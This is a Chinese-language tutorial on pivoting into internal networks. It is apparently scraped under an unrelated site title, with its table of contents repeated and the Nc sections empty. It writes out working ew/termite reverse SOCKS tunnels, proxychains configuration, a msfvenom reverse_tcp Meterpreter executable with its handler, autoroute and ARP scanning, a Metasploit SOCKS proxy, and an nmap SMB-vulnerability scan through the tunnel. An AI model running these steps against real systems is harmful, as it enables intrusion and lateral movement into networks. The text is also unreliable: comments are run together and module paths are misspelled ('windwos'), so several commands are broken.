愛愛做網(wǎng)站開源crm系統(tǒng)
目錄
內(nèi)網(wǎng)滲透
Nc使用詳解
Nc監(jiān)聽和探測(cè)
Nc傳文件
termite內(nèi)網(wǎng)穿透工具
ssh代理內(nèi)網(wǎng)穿透
ssh配置socket代理
MSF多級(jí)網(wǎng)絡(luò)穿透
內(nèi)網(wǎng)滲透
Nc使用詳解
Nc監(jiān)聽和探測(cè)
Nc傳文件
termite內(nèi)網(wǎng)穿透工具
1、termite 之前叫ew ? (可以進(jìn)行正向連接,可以進(jìn)行反向連接)
?
2、
靶機(jī)監(jiān)聽流量轉(zhuǎn)發(fā):./ew_for_linux64 -s rcsocks -l 1111 -e 2222#將1111端口監(jiān)聽到的本地?cái)?shù)據(jù)轉(zhuǎn)發(fā)到 web服務(wù)器的2222端口# 通過1111端口,將本地流量轉(zhuǎn)發(fā)出去#rcsocks、rssocks 用于反向連接#ssocks 用于正向連接# -l 指定本地監(jiān)聽的端口# -e 指定要反彈到的機(jī)器端口# -d 指定要反彈到機(jī)器的IP# -f 指定要主動(dòng)連接的機(jī)器 ip# -g 指定要主動(dòng)連接的機(jī)器端口# -t 指定超時(shí)時(shí)長(zhǎng),默認(rèn)為 1000root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
?
監(jiān)聽機(jī)的流量轉(zhuǎn)發(fā):
#將流量通過2222端口傳到192.168.16.128主機(jī)上
#rcsocks、rssocks 用于反向連接#ssocks 用于正向連接# -l 指定本地監(jiān)聽的端口# -e 指定要反彈到的機(jī)器端口# -d 指定要反彈到機(jī)器的IP# -f 指定要主動(dòng)連接的機(jī)器 ip# -g 指定要主動(dòng)連接的機(jī)器端口# -t 指定超時(shí)時(shí)長(zhǎng),默認(rèn)為 10003、windows和linux差不多!
ssh代理內(nèi)網(wǎng)穿透
正向代理就是利用已經(jīng)控制的主機(jī)來控制更多的主機(jī),主機(jī)可能存在內(nèi)網(wǎng)網(wǎng)卡,可以通過內(nèi)網(wǎng)穿透工具來控制內(nèi)網(wǎng)主機(jī)! ? 反向代理就是在本地開啟一個(gè)端口,通過ssh服務(wù)把端口映射到跳板機(jī)的ssh服務(wù)器的內(nèi)網(wǎng)ip端口上,這樣內(nèi)網(wǎng)主機(jī)就可以直接訪問我們本地主機(jī)服務(wù)!
ssh配置socket代理
1、當(dāng)然我們需要在 /etc/proxychains4.conf 文件里面修改代理端口
我們就可以直接使用本地流量進(jìn)行攻擊!┌──(root?ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5 127.0.0.1 8081代理完成之后就可以使用本地流量進(jìn)行內(nèi)網(wǎng)信息收集了
MSF多級(jí)網(wǎng)絡(luò)穿透
1、可以先控制web主機(jī)。直接生成監(jiān)聽木馬,然后利用web主機(jī)的漏洞從而獲取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地監(jiān)聽I(yíng)P lport=本地監(jiān)聽端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木馬類型2、msfconsole 監(jiān)聽模塊
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地監(jiān)聽I(yíng)P
set lport 本地監(jiān)聽端口 (這幾個(gè)參數(shù)要和生成的木馬一樣!!)
在web主機(jī)上運(yùn)行shell.exe即可!3、添加內(nèi)網(wǎng)靜態(tài)路由
run autoroute -s 內(nèi)網(wǎng)IP網(wǎng)段
然后就可以掃描該網(wǎng)段了
run post/windwos/gather/arp_scanner RHOSTS=內(nèi)網(wǎng)IP網(wǎng)段
當(dāng)然我們也可以使用msf自帶的端口掃描模塊(auxiliary/scanner/portscan/tcp)4、socks5代理
如果我們想在本地使用掃描器來進(jìn)行內(nèi)網(wǎng)信息收集,我們就可以利用msf的socks5代理設(shè)置,前提是我們已經(jīng)拿到了web主機(jī)的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run┌──(root?ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:45163 0.0.0.0:* LISTEN 1150/containerd
tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 19399/ruby
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1174/sshd: /usr/sbi
tcp6 0 0 :::22┌──(root?ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5 127.0.0.1 1234這樣我們就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445 --script=smb-vuln-ms* 內(nèi)網(wǎng)IP (正向掃描)在此之后,我們?cè)俅芜M(jìn)行msf漏洞攻擊的時(shí)候就必須使用正向的payload了!